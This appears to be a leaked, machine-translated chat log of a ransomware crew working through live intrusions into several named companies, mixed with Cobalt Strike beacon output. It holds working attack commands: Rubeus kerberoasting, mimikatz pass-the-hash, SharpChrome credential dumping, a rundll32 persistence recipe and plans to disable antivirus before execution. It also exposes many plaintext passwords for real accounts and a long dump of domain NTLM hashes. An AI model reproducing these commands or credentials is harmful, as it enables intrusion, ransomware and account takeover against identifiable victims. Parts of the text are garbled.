Chromium Credential (User: jessicak) --- URL : javascript:; Username : et@chetu.com Password : Admin4U --- Chromium Credential (User: jessicak) --- URL : https://www.snapengage.com/signin Username : et@chetu.com Password : AdminTeam3 --- Chromium Credential (User: 
jessicak) --- URL : http://review.chetu.com/LoginForm.aspx Username : jessicak@chetu.com Password : Sweet@8733 --- Chromium Credential (User: jessicak) --- URL : https://secure.sharefile.com/oauth/authorize Username : et7rs@chetu.com Password : Team7Clo$e --- Chromium Credential (User: jessicak) --- URL : https://apps.thinkhr.com/ Username : Password : Acissej8733 --- Chromium Credential (User: jessicak) --- URL : https://apps.thinkhr.com/ Username : jessicak@chetu.com Password : Acissej8733! --- Chromium Credential (User: jessicak) --- URL : http://backbone:9090/Human-Resources/Lists/Leave%20Management/AllItems.aspx Username : jessicak@chetu.com Password : Sweet@8733 --- Chromium Credential (User: jessicak) --- URL : javascript:; Username : et@chetu.com Password : Admin4U --- Chromium Credential (User: jessicak) --- URL : https://fundraising.stjude.org/site/TRR/547026355 Username : Jkay8733 Password : Sweet@8733 [*] Finished Google Chrome extraction. ``@user4 silence@user7 took the session 2 more? and then suddenly on the desktop....)in the conf conf, before running the dll, write down where you putDo you run through the shell rundll32 so with , comma exactly need? so, I give 1 dll in the conf, on 1 pc run it. criteria: -hide it away in user folders (in %appdata%) a few levels deep and mask the name to be synonymous with those where you put -Run it like this `rundll32 FULL_PATH_THE_DOLL\IMA.dll, entryPoint` -Check that it hasn't deleted -write in conf that you run and check the source file ``. execute-assembly /SharpChrome.exe logins /showall ``+looks like normal 4 two see Done Capture as user9 in the sweatshop has already said so fucking much +[ ](https://mediaeveryone.com/channel/general?msg=vNxoz7iD8gcZgQHSv) in the input cobbler only @user9 confirmed + waiting + in the input cobbler who has the network "checked" farther differently, one again cmd off, the second has 3 pc for analysis @user7 already 3 input sessions)Domain ad.happay.what on AD? 
beacon> execute-assembly /home/user/tools/ShWeb/SharpWeb.exe all [*] Tasked beacon to run .NET program: SharpWeb.exe all [+] host called home, sent: 705073 bytes [+] received output: === Chrome (Current User) === [+] received output: [X] Exception: The parameter is incorrect. === Checking for Firefox (Current User) === === Checking Windows Vaults === [-] Invoke_3 on EntryPoint failed. `````` beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpWeb.exe all [*] Tasked beacon to run .NET program: SharpWeb.exe all [+] host called home, sent: 705073 bytes [+] received output: === Chrome (Current User) === [X] Exception: The parameter is incorrect. === Checking for Firefox (Current User) === === Checking Windows Vaults === [-] Invoke_3 on EntryPoint failed. No rights in the conhost and swhost I can't get in. ``` adazure.app Administrator dhcpadmin.app joomlatest1 joomlatest2 kassabp kassabp.adm macmainw macmainw.adm Nagelr.adm scriptadm.app Troysec.adm usanet.adm ``Yeah, take off sharpwebfirefox the process list and adne thick`` beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpChrome.exe logins /showall --- Chrome Credential (Path: C:\Users\forstern\AppData\Local\Google\Chrome\User Data\Default\Login Data) --- file_path,signon_realm,origin_url,date_created,times_used,username,password C:\Users\forstern\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://editor.vev.design/,https://editor.vev.design/login,9/2/2020 4:11:19 PM,13243551079155078,,Piper16! ``as soon as you check immediately + in the noteproverifybnpmedia.com I also check the rest? without confirmation only 3 users noteFRIVER.LOCAL there is one more appearedvip.pet write here the domain to which to create confona works and glorovnodavshego to salaku what to do in there should not work? 
works as a tip `` `` shell net group "domain admins" /dom && net group "enterprise admins" /dom && net localgroup administrators ``Can you give us a session?`` Try dotnet brute force or smb login no no it didn't work.``The point of smb through smb_login?`` And what about brute force? beacon> execute-assembly /home/omar/Desktop/Fast-Guide/Net-GPPPassword.exe [*] Tasked beacon to run .NET program: Net-GPPPassword.exe [+] host called home, sent: 114731 bytes [+] received output: Processing files in \GPJ.LOC\sysvol\GPJ.LOC\policies\ ``` I can't get an error, but there's no result, nothing happens. elevate seems to work SharpUp says yes, guys, the user is a local admin, you can bypass yuacni Net-GPPPassword and winpis won't show it to gpj and won't let it in. such pies what haven't tried before now guys are trying everything from gostpak they are not workingwatson shows two vulnerabilitiesrubeus and kerberost doesn't accept domain specified as gpj and gpj.I've tried with Semen to run a brute force attack with sharpshrome, it blames on the domain. what's the problem now?[ ](https://mediaeveryone.com/channel/general?msg=9jNJDKiXxwpxapwMa) eto ne taketo so progress? 1) Domain Admins. 2) Enterprise Admins 3) Local Admins 4) Ad Info execute-assembly /Rubeus.exe asreproast /format:hashcat /outfile:C:\ProgramData\asrephashes.txt ``https://habr.com/ru/company/pt/blog/423903/выводит help does not work with parameter ``kerberoast```` execute-assembly /Rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\ProgramData\hashes.txt ``` Dumps all crb hashes, analog of script on ps`31d6cfe0d16ae931b73c59d7e0c089c0` is an empty string, remember! there are no users in AD with such a password, if you see such a ps, then the account is not workingsocreate to telnet,ssh,web,mssql,smb,rdp,vnc`ports 1-1024,3389,5900-6000` why scan such a range? there are 900 empty ports and no mssql? 
[02]: Fortinet SSL VPN Virtual Ethernet Adapter Connection Name: Ethernet 3 DHCP Enabled: No IP address(es) [01]: 10.59.12.209 [02]: fe80::89c3:6e80:ed9e:ca27 `````` The VPN seemed to be active ``` If his process just hangs there, it does not mean that it is active) ok. will appear - let's try the same as in the classic with cisco clients in generalvpn, I think, was active or LDAP tied there or through the RADIUS is authorizedWe kind of just discussed this point with Fortigate client, the point is that connecting through the Wpn via Fortigate client through the "domain" creeds occurs and connect the machine to the domainTo see the domainConnect through wpn@tl1 , while there is time, can you tell me how to be in the network matches? I can not see the DC there. Any thoughts on this? (ICMP) Target '172.16.200.1' is alive. [read 8 bytes] [+] received output: 172.16.200.1:139 172.16.200.1:135 [+] received output: 172.16.200.1:445 ``. And if they're also pinged, they're the ones you should be aiming at ``. beacon> run net use * "\192.168.168.10\Shares" /persistent:no /user:PKGPROD\jess 0204 [*] Tasked beacon to run: net use * "\192.168.168.10\Shares" /persistent:no /user:PKGPROD\jess 0204 [+] host called home, sent: 92 bytes [+] received output: Drive Z: is now connected to \192.168.168.10\Shares. The command completed successfully. ``Don't bother to think about it)``like if they do it there will be 1.5 pc? but now I do not understand about the packaging in general? read that they were serviced not so readWhere is the origin of the idea that they could serve someone. I told you above that they were in service with a company that provides a range of IT services including PC maintenance.so? oh fuck)))))) These guys were in the packaging business.were they serviced or serviced? 
wtf ``` tl1 Team Lead 1 @tl1 Admin Owner 02:51 service company for PCs and other things consists of 20 PC's) ``Composed of 20 PCs) a company that provides services to PCs and other wickednessThey were serviced by a company that provides services to PCs and other wickednessNo one sees the forest of domains? And what makes you think that DMX somehow related to them?[ ](https://mediaeveryone.com/group/itc-us-com?msg=Boet2zFtPiCYxiBHP) in hell info 20 PCs, no doubts? AV lab some more than this network, how does it even work and keeps the site?) There was not a hint of itThe subnet look was also the domain DMX ``. .168.5.13:445 [+] received output: 192.168.5.17:445 (platform: 500 version: 6.1 name: KEY2 domain: SAMBA) 192.168.5.18:445 (platform: 500 version: 6.1 name: TSLINUX domain: TIMESAVERS) 192.168.5.23:445 192.168.5.24:445 [+] received output: 192.168.5.25:445 192.168.5.26:445 192.168.5.27:445 192.168.5.28:445 192.168.5.30:445 [+] received output: 192.168.5.98:445 (platform: 500 version: 6.1 name: TSLINUX98 domain: WORKGROUP) 192.168.5.117:445 (platform: 500 version: 4.9 name: KEY domain: DMX) [+] received output: 192.168.5.99:445 (platform: 500 version: 6.1 name: RHEL8 domain: TIMESAVERS) 192.168.5.188:445 ``1) and there is no guarantee that in another subnet were not the wind hosts from that domain? They are all in another subnet which was not a hint in the one with which they worked, + NN - hydrogenvgworkgroupThat * + N vgshek even in the subnet where were * This domain would NEVER know if we do not suffer the fuck) at least there was another domain + N vgshek even in the subnet where were pkgprod gone to shit?If everything goes fucked up again as in pkgprod tomorrow, we'll have a serious talk with everyone, even if you do everything well and cover all the servers and everything that's online + What's wrong with running it? If we run it in 4, we'll spend half a day here. go to work tomorrow)? 
Tomorrow is a day off))) max 42 hours to start the build if there is a variant go to the new ones anyway, this is a waste of time if 2 hours to search for information2 hours to what? then run us another 2 hours here DOUBLE WINDEF AND START EXECUTION what have we here?[ ](https://mediaeveryone.com/group/itc-us-com?msg=p8XMqsLRzJ3xcFWeu) on one user this error, another user finds :man_shrugging: concluded that this error - nothing was found. get-eventlog "Security" | where {$_.Message -like "*login*" -AND "Source Network Address"} | export-csv C:\windows\temp\user.csv ``So there's an error here on the tula itself.`` beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpSniper.exe egl_admin ITC\br_admin CAKE@horse369!@@ [*] Tasked beacon to run .NET program: SharpSniper.exe egl_admin ITC\br_admin CAKE@horse369!@@ [+] host called home, sent: 113785 bytes [+] received output: [-] Invoke_3 on EntryPoint failed. beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpSniper.exe egl_admin ITC\egl_admin E@gle@x1s3030 [*] Tasked beacon to run .NET program: SharpSniper.exe egl_admin ITC\egl_admin E@gle@x1s3030 [+] host called home, sent: 113781 bytes [+] received output: [-] Invoke_3 on EntryPoint failed. beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpSniper.exe johnnyp ITC\br_admin CAKE@horse369!@@ [*] Tasked beacon to run .NET program: SharpSniper.exe johnnyp ITC\br_admin CAKE@horse369!@@ [+] host called home, sent: 113781 bytes [+] received output: [-] Invoke_3 on EntryPoint failed. Try the classic one, but the sniper still does not show up We know that he is logged into some dkou, some he is looking for) when the last logon was last logon And look at net center Try also specifying another user to search for Try and with direct credentials In the last case it worked like that in other networks with a token did it work fine Have you tried with direct credentials? did you test in laba tool? 
just login of the one you're looking for,the syntax on git is like this)user -?`` beacon> pth ITC\br_admin 555601b2d489ec2bfb7d189544736c8b [*] Tasked beacon to run mimikatz's sekurlsa::pth /user:br_admin /domain:ITC /ntlm:555601b2d489ec2bfb7d189544736c8b /run:"%COMSPEC% /c echo 90835b1e435 > \.\pipe\06c1fb" command [+] host called home, sent: 23 bytes [+] host called home, sent: 438863 bytes [+] Impersonated NT AUTHORITY\SYSTEM [+] received output: user : br_admin domain : ITC program : C:\Windows\system32\cmd.exe /c echo 90835b1e435 > \\.\pipe\06c1fb impers. : no NTLM : 555601b2d489ec2bfb7d189544736c8b | PID 28132 | TID 127016 | LSA Process is now R/W | LUID 0 ; 1041160668 (00000000:3e0ed9dc) \_ msv1_0 - data copy @ 0000025C26677D20 : OK ! \kerberos - data copy @ 0000025C279CE058 \_ aes256_hmac -> null \_ aes128_hmac -> null \_ rc4_hmac_nt OK \_ rc4_hmac_old OK \_ rc4_md4 OK \_ rc4_hmac_nt_exp OK \_ rc4_hmac_old_exp OK \_ *Password replace @ 0000025C2CCF4598 (32) -> null beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpSniper.exe egl_admin [*] Tasked beacon to run .NET program: SharpSniper.exe egl_admin [+] host called home, sent: 113725 bytes [+] received output: [-] Invoke_3 on EntryPoint failed. ``with the token.../SharpSniper.exe [User]what do you specify? and how do you look for? well, the sniper looks at the logstipo logs are not written on the dk? >In events on the dk does not write (sharpsniper) in events on the dk does not write (sharpsniper) through powerview only finds it on the rc\dk in ad_computer no computers with hints of admin except one, but he cd not available) and search for admins PCs? admins go to rdc, dk on rdp obscure where workstation i had them yesterday still chekatatam computers just with the prefix wsa comps like ITITC-LMAO no why search the servers at all? pc itshnikov empty? 
soobsnabolshe in chrome histories on the servers no from a machine `ITCMA-RDS01 ` to av went polzak ` SLEAdmin ` ``` http://anywhere.webrootcloudav.com/zerol/wsasmekevalalpha.exe8 ``` ``` http://downbox.webrootanywhere.com/wsasmeexe/022AENTP19F2B7A74491exe ``` ``` http://anywhere.webrootcloudav.com/zerol/wsasmekevalalpha.exehttp://webrootcloudav.com/ ``[ ](https://mediaeveryone.com/group/itc-us-com?msg=iLMih4xmBT6FFRfGN) I mean the AV, he goes here without a problem, but there's no management, purely logical ``` https://my.vmware.com/ `````` administrator@vsphere.local ``` from vsphere, the password does not fit[ ](https://mediaeveryone.com/group/itc-us-com?msg=NaahsFk2RtTbvzou5) did not log in? and where the access saved? on all servers and more or less technical PCs looked[ ](https://mediaeveryone.com/group/itc-us-com?msg=39MCkb4mf4KJgqGoE) he did not log in from this dk, and in general where he logged in not found anyway check this pathwhy? just confirm adding device+even if the device has already logged in?i don't know how it works with AV muzzles but sim and tv always need the code i think that only when logging in from an unknown place why? if the browser fingerprint is saved or do you think they get the code every time? no? code from a cell phone anvey need it in AV it is not logged in take chrome) and deploy it on the desktop under soksom i will check if there is a session `` `` C:\Users\egl_adminAppData\Local\Google\Chrome\User Data\Default\Login Data,https://my.vmware.com/,https://my.vmware.com/web/vmware/login,7/15/2020 9:05:52 AM,13239291952720834,stevev@egltech.net,B00b00licious ``10.0.0.38 in chrome in the file? dkITCMA-FILE02[ ](https://mediaeveryone.com/group/itc-us-com?msg=nk9CPM5CPDJNBxDwP) they will also fit to vsphere with 90% from where they were taken? 
:zany_face:`` stevev@egltech.net B00b00licious ``` yeah, it's a creds from av, but you need a two-factor there ``` https://my.vmware.com/web/vmware/login stevev@egltech.net B00b00licious ``` oooo this seems to be the mail from either webroot or cloudbucket, hint to all-all-servers [X] Error triaging C:\Users\.NET v4.5\AppData\Roaming\Microsoft\Protect\S-1-5-82-271721585-897601226-2024613209-625570482-296978595\460d0a91-e4b0-4ac8-96bd-413bf84d1909 : Index was out of range. Must be non-negative and less than the size of the collection. Parameter name: startIndex C:\Users\egl_admin\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://itcse12000-manj08bw1e88orb4.dattoweb.com/,https://itcse12000-manj08bw1e88orb4.dattoweb.com/,1/16/2019 11:04:30 AM,13192128270776825,, C:\Users\egl_admin\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://login.veeam.com/,https://login.veeam.com/,8/8/2019 1:46:59 PM,13209760019353590,, ``` ``` https://my.vmware.com/web/vmware/login stevev@egltech.net B00b00licious ``` ``` http://10.0.0.1/webui/ cisco E7c+z~%g~KnxzsRG ``` ``` http://10.0.0.52:8000/login Administrator 7654321 ``` ``` http://52.44.205.233/login Bradbeers Bradbeers ``` ``` http://52.44.205.233/login itc-operations itc-operations ``` ``` http://10.0.0.38:801/ benr C@KEhorse369! ``` ``` https://auth.ruckuswireless.com/login mderfler@microvisionsinc.com M@keAMYW0rk1 ``` ``` https://remote.itc-us.com/rdweb/pages/en-us/login.aspx ITC\greggh,71mpR$ 8361 rebeccav,RVT!9211 Toddd,Kamejod!21 ``` ``` http://itcma-mits01/,http://itcma-mits01/mitsdiscover/login.md grantc,Fall@2021! greggh,71mpR$ 8361 jamesn,Led$9909 jasonh,fall@ITC2020! jasonh,Trump$2020! ``` ``` http://52.44.205.233/login benjamin-facility benjamin-facility ``` ``` ``The rest of the stuff we're looking for we'll disable the rest by hand on the servers How do we disable the rest? yes only webroot it was theoretically) webroot you wanted to bang through gpotam only windef + webroot? 
disable windef and hope that webroot does not burn at startup?) what to do with armaments? on ITCMA-RDS-SVR01 BtSystem.Service.exe DattoBackupAgent.exe DattoProvider.exe MsMpEng.exe WRSA.exe under a bunch of ITCMA-FILE01 DattoBackupAgent.exe Veeam.EndPoint.Service.exe Veeam.EndPoint.Tray.exe ITCMA-ENG01 found besides WRSA.exe: WRCoreService.x64.exe WRSkyClient.x64.exe it's normal vindef on servers in general is very often disabled in processes vindefanu on some servers that it does not count then sitbelt it ... yes vindef process MsMpEng.exe like? in the tasklists wrsa.exe (webroot) wesdenu then most likely it is clean, try randomly 3-4 machines to look at the list unless the hellokveri everywhere said "I did not find anything do whatever you want do not shit yourself "good afternoon, sorry I did not say hello) *not always accurate` `` on the dumb ones: ``` sitbelt's way of numbering is not always points, try edr_qu51B↩ceguna on otlnlnlnlnlnlnlnlnlnlnlnlnlnlnlnlnlnlnlnlnlnlnlng: ``` ====== AntiVirus ====== Cannot enumerate antivirus. 
root\SecurityCenter2 WMI namespace is not available on Windows Servers ``ITCMA-ENG01 ``` ====== AntiVirus ====== Engine : Webroot SecureAnywhere ProductEXE : C:\Program Files (x86)\Webroot\WRSA.exe ReportingEXE : C:\Program Files (x86)\Webroot\WRSA.exe Engine : Windows Defender ProductEXE : windowsdefender:// ReportingEXE : %ProgramFiles%\Windows Defender\MsMpeng.exe Engine : Webroot SecureAnywhere ProductEXE : C:\Program Files (x86)\Webroot\WRSA.exe ReportingEXE : C:\Program Files (x86)\Webroot\WRSA.exe Engine : Webroot SecureAnywhere ProductEXE : C:\Program Files (x86)\Webroot\WRSA.exe ReportingEXE : C:\Program Files (x86)\Webroot\WRSA.exe ``ITC-DC-SVR01 ``` ====== AntiVirus ====== Engine : McAfee Endpoint Security ProductEXE : C:\Program Files (x86)\McAfee\Endpoint Security\Threat Prevention\AMCFG.EXE ReportingEXE : C:\Program Files\McAfee\Endpoint Security\Threat Prevention\mfeensppl.exe Engine : Windows Defender ProductEXE : windowsdefender:// ReportingEXE : %ProgramFiles%\Windows Defender\MsMpeng.exe ``We need to look for a place from where it is allowed to do it Yes, there is more than one, just copied from the log wrong there is more than one link at least? although still October 7 went to[ ](https://mediaeveryone.com/group/itc-us-com?msg=TBdtfjmaFkBgnNvkv) this link says that access from this place is denied or not theustarev vsphere creed does not let even their server lol, I rndmicdgeorg from who?) see what caught) we let the `` execute-assembly /home/user/TOOLS/SharpShares.exe shares --hostlist ad_computers_names.txt [*] Tasked beacon to run .NET program: SharpShares.exe shares --hostlist ad_computers_names.txt [+] host called home, sent: 117883 bytes [+] received output: Loading hostlist from ad_computers_names.txt [*] Parsed 20597 computer objects. All are repeated as we need)) no other LAs? Yes, half of where you have where the admin ball is already visible sessions?) 
added a piece that reads from the file and not from Іdarkak?)[ ](https://mediaeveryone.com/group/snpartners-com?msg=WXExMm3N9gES3d3uu) SharpShares - I corrected it a little)[ ](https://mediaeveryone.com/group/snpartners-com?msg=6g99grAzh2vAziixR) `` 204.16.247.229 https://instwp.com - 199.127.60.227:52742 SP7PeWVtkJcPZlbXZOSlVpK4g61drpgJlUZ ``@user9 give me your cobu by the way. ``` 10.10.39.194:636 10.10.39.194:443 10.10.39.194:389 10.10.39.194:88 10.10.39.194:80 Thank you fill in the archive all the trusts + the main AD infonu since such a crash was found, it probably should ... check the rest, should I recheck? Pinging lrhvcenter1.lrhc.local [10.10.39.194] with 32 bytes of data: Reply from 10.10.39.194: bytes=32 time<1ms TTL=63 Reply from 10.10.39.194: bytes=32 time<1ms TTL=63 Reply from 10.10.39.194: bytes=32 time<1ms TTL=63 Reply from 10.10.39.194: bytes=32 time<1ms TTL=63 Ping statistics for 10.10.39.194: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms ``Is it available? We've seen this case more than once...`` It's in linux...`` It didn't go out with the script...`` >operatingSystemServicePack: Likewise Open unknown.unknown.unknown >dNSHostName: lrhvcenter1.lrhc.local ``LRHVCENTER1 anything with processes in VM was questioned by some of the virtualization system?they are in addition to dk will be dns servers put in a separate group and then all together close this one after half an hour help colleagues close it05:32 PM tell time correct this moment when 100% loss it writes like this all that in 100% loss so habit put in brackets why is written 100% loss if it even in dns is not present? another thing `` `` beacon> shell ping LRHVCENTER [*] Tasked beacon to run: ping LRHVCENTER [+] host called home, sent: 82 bytes [+] received output: Ping request could not find host LRHVCENTER. Please check the name and try again. 
`````` LRHVCENTER UNRESOLVED UNRESOLVED DOWN ``Or is it just not visible from that scan? How do you get there? It's knocked out, it's not going to go there.`` >dNSHostName: LRH-AriaWeb.lrhc.local >servicePrincipalName: TERMSRV/LRH-ARIAWEB >servicePrincipalName: TERMSRV/LRH-AriaWeb.lrhc.local >servicePrincipalName: WSMAN/LRH-AriaWeb.lrhc.local >servicePrincipalName: WSMAN/LRH-AriaWeb ```` LRHVCENTER.lrhc.local`Indefined (100% Loss):\```` >dNSHostName: LRHCamera1.lrhc.local >servicePrincipalName: MSSQLSvc/LRHCamera1.lrhc.local:1433 >servicePrincipalName: MSSQLSvc/LRHCamera1.lrhc.local ````LRHCAMERA1.lrhc.local` exactly sql? why terminal? ` LRH-ARIAWEB.lrhc.local` let me see the main one) yes you have 10 pkvot in the domain all you have threw nas and stuff? status on all 3 domains? well sorting is done as a matter of fact `` Backup: CPNBACKUP.lrhc.local Hyper-v: LRHRECOVERY1.lrhc.local LRHRHRecovery2.lrhc.local VM: LRHSRV2.lrhc.local LRHVS2.lrhc.local PMAPP01.lrhc.local OPIMAGE01.lrhc.local `````` WINSCRIBE.lrhc.local [10.10.41.142] In the input I do not see any backups in the trusts no backups? in the trust ffmg one server does not work, even the DA does not pass there, put the brute force all the users I just pinged the servers, sorted in trusts, there are very few live servers, and no backups-nas-hypervi found now sorting servers in the entrance domain, there are a lot of them and maybe get something related to virtualization or backups? 
Administrator fe58579aa5762bdc2570e85dd2e0b65e:8cb7e0d1806e8bb55dee9954e2d8bdfd beadmin aad3b435b51404eeaad3b435b51404ee:ee32e572565734a3322bbd2fd90fd750 tkadmin 378ef0f1e4545db12dca4431c6f3913d:81199155c72235ba7ee1e4b39da00702 WinScribe 48d0237d57a6a9698e5d533411003c5c:3d1a6aecc94c7ca42f1687fe84466dc3 replicadb fbfe8157f8e57933223fd1a66060b0b7:3b89729a25618c03434dc1275fe496ef replicafs 44ca886daafb03c8223fd1a66060b0b7:128b2ae749d5c25e46fce831eca0a708 wsadmin 8e763074c3c817ef0d68d65838d6d0e5:7035c23d0d3673cec64ea326511cc547 petekuttera 329cd609db9f46ee434ed058fe278f0b:e65e7043f9e8c2321284f39e830a51ba glendahoffa 74deea7f7a668094c9055ef02950a7db:94de31b62705ce9e325a95982e42752c ``Well, did it work? I injected it into the administrator's process, make no yoze with a direct quote token, and everything works without the token? >dNSHostName: Winscribe.ffmg.local >operatingSystem: Windows Server 2003 ``` ``` >dNSHostName: CLINIC.ffmg.local >operatingSystem: Windows Server 2003 Is there a wine at all? 
with tokens it won't let kmd run ``` beacon> shell dir \\10.5.50.15\C$ [*] Tasked beacon to run: dir \\10.5.50.15\C$ [+] host called home, sent: 50 bytes [-] could not spawn C:{\WINDOWS\system32\cmd.exe /C dir \\10.5.50.15\C$ (token): 1349 ``` ``` beacon> shell dir \10.5.50.2\C$ [*] Tasked beacon to run: dir \10.5.50.2\C$ [+] host called home, sent: 49 bytes [-] could not spawn C:\WINDOWS\system32\cmd.exe /C dir \\10.5.50.2\C$ (token): 1349 ``Without counting the current machine, there are two live servers, total of 3/9 in the domain ``` Pinging WINSCRIBE.ffmg.local [10.5.50.15] with 32 bytes of data: Reply from 10.5.50.15: bytes=32 time<1ms TTL=127 Reply from 10.5.50.15: bytes=32 time<1ms TTL=127 Reply from 10.5.50.15: bytes=32 time<1ms TTL=127 Reply from 10.5.50.15: bytes=32 time<1ms TTL=127 Ping statistics for 10.5.50.15: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms ``` ``` Pinging CLINIC.ffmg.local [10.5.50.2] with 32 bytes of data: Reply from 10.5.50.2: bytes=32 time<1ms TTL=127 Reply from 10.5.50.2: bytes=32 time<1ms TTL=127 Reply from 10.5.50.2: bytes=32 time<1ms TTL=127 Reply from 10.5.50.2: bytes=32 time<1ms TTL=127 Ping statistics for 10.5.50.2: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms `````` CLINIC CLINIC2 CLINICDC WINDOWSUPDATE REPLICAFS1 WINSCRIBE REPLICA LIGHTSPEED CLINICDC2 ``:muscle:good job backups, nasa, virtualization preparing to close 3 domains all)``pipe pulled in? 
[DC] 'ffmg.local' will be the domain [DC] 'clinicdc.ffmg.local' will be the DC server [DC] Exporting domain 'ffmg.local' 1163 merickson 1a9beddc1916a4a37017f3ecfe38c258 544 1335 IWAM_CLINIC e19601e689bfa99443f7f4b2c92fd4cb 66080 1169 mhalvorson bf84281424e06207f752c1a4495f547a 544 1244 patacct c2f55f15067c8a66a03b9f75c85e22b5 544 1371 training d0ba34bffdc990ff4772eb5c73cf5737 66048 1447 replicafs 128b2ae749d5c25e46fce831eca0a708 66048 1256 mmoore 1d7bb4376d9960ed7faa16e01f8e3cdd 544 1482 phed 21bbac9b5bafe88b4f4d9e14b1e0f0948 512 1507 mrtg 8f1e900bcac9813b84b888c6c9247843 66048 1409 bgagner 2f3dc2e0dc1540adb4fc84e8d5ecb96a 512 1531 wsadmin 7035c23d0d3673cec64ea326511cc547 66048 1562 katrinajohnson 5b4c6335673a75f13ed948e848f00840 512 1445 drowan 600a406c2c1f2062eb9bb227bad654aa 66050 1572 bonniezimmel e907a84bfd715fb39abeb6d4a3064300 512 1151 jwilkus f049bfe885a011e816785108f613bb1d 546 1202 ohovland 38110ff938137269f2a0471a33808929 546 1168 medicaltrans e2a41cc5e882c59d66a950721675d9c1 544 1603 marilynewan 4cd06eb29cf45c53944369c960ddc84e 512 1140 dskistad c6b814406a70f8a8eff945fcb5176453 544 1411 vheifort 1726c0ed5c3ce736de4a59dcb70deac4 514 1590 katyrisbrudt 5f0f6c0018275d54e5678ab259164984 512 1426 dstrange ee8ebda55a117f1906137cd0abaec49e 514 1164 mewan 5b4c6335673a75f13ed948e848f00840 544 1585 nicoleweber ba9bae84828ea45e15c45d1e5f9e37bf 66050 1643 barbarameder fdd6105d920cb5ffbed8de6d3a16fc8c 512 1651 HP13799540225$ 7f9a157dbb26e185d79603c1e1ca552a 4096 1619 TEMP03-DRTONG$ 56cf9e5b6e91816806d38aabdf83ef51 4096 1571 drvanvalkenburg b3dc5796146168c629bd2344ba641bb1 512 1261 ssamson 31d6cfe0d16ae931b73c59d7e0c089c0 544 1214 mjnorgard 408e810859087f51940cd6d988361ff1 544 1241 petzell 3fe1968ef9446fc2dcdb7710acdf8c8e 544 1253 bschmidt 5e40fb3ca52bd24e23eced0ec3f1115e8 544 1621 datomb 5b4c6335673a75f13ed948e848f00840 512 1263 nlocsin 03433178a7d79b3d3e9ba63aa875d4fb 66082 1640 robinswanson d9e4da83ed523ab06bda61ebaa35024e 514 1193 bbaur 
a7855b78ea36d58bf38d64306e682f4f 546 1608 glenda2 41a0cf95ef2cd698846d4206e2150aea 512 1472 hthompson b63b839c95ddee3aa3ed0f1d7d62513a 514 2177 SOLARWINDS_WEBSITE 93a28d06a356d027669d73454161ffb3 66048 1129 bswanson 36ba05f307a2cbcc31cf0dcac9c64cb2 546 1513 shirleymeyer 602e94baa8f3a2c5761b79dec37d92ec 66050 1230 smartinson ceee8de8be2a3bdc5c1c268d76617758 546 1647 peggybrusven e1a277819ef9e34b4243230b63663ab4 514 1673 tanyahanstad 5cb4dc02e8fee91395dacf25be277d18 512 1257 preregistration 1623f25bc717c913c0e785b990835a70 546 1247 registration e4d1e951d92fe59746bb34b6c24ad72c 546 1685 carolpierce 5b4c6335673a75f13ed948e848f00840 512 1125 aellingson 7cfe1c76e6f61ee628910cd68cc6fbed 546 1648 megangriep 5b4c6335673a75f13ed948e848f00840 514 1542 kjorgens 26e3dab3479a026f9b9388cac0bb32d0 514 1679 emileehaugen 45c5a532738b9fa30a42f8ea48587bf6 514 1638 kimkugler 7cfe1c76e6f61ee628910cd68cc6fbed 514 1578 stephenlipson 0ff921941dae72d793e488f418f30b 66050 1591 kimklinger 5b4c6335673a75f13ed948e848f00840 512 1615 jdimke2 1f3b8ae8a302a7fb04680ce3f420637c 512 1726 jasoneggers 5b4c6335673a75f13ed948e848f00840 512 1289 KINETXSQL$ fe54a4823641a82d86271220e8695bbe 4096 1139 dcrintea 53b8304274902aa66b0cab35a26fccdc 544 1258 medical aa1ca0d0e5967c8942676d74d475e4 544 1697 staceylang 416a72f200b2f7da4a5abfad301665f2 512 1457 aerickson 5df827e6c35ee2e0e9f26a14d0685900 514 1518 marierund 038416de722248d4c0db0b34c68eb065 66048 1668 courtneyfrazier dd8eeaec27c155fe35e43f16f4d84168 514 1416 sverdorn da252e960b2c34e1bb1da4800bfdee2b 514 1413 pdoms 2fd2d807513f87a55d51ea76ed8f68f1 514 1412 mcasper af696aa831ce6bcadb1ac2690b8b9569 514 1415 dweinbar ec74b2b19dd7c9e4a2eb8ed7461dd780 514 1584 deelindholm 4697e64dec7e7c7b129765c00dae3a3f 66050 2128 IT01$ 9e4c21bcba9a986b90926044c408a714 4096 1740 lisameyers e8aa6d47847b8e2c99fd3cfe35f051e 512 1574 tempceo 21fb7bca2b6f3fdabff9288ad62ff1bd 514 1190 kdenker 2d782825f402ebf523ce5422c31a5227 66082 1143 gripley b0121e3d65f926674e464945aeddf1ca 544 
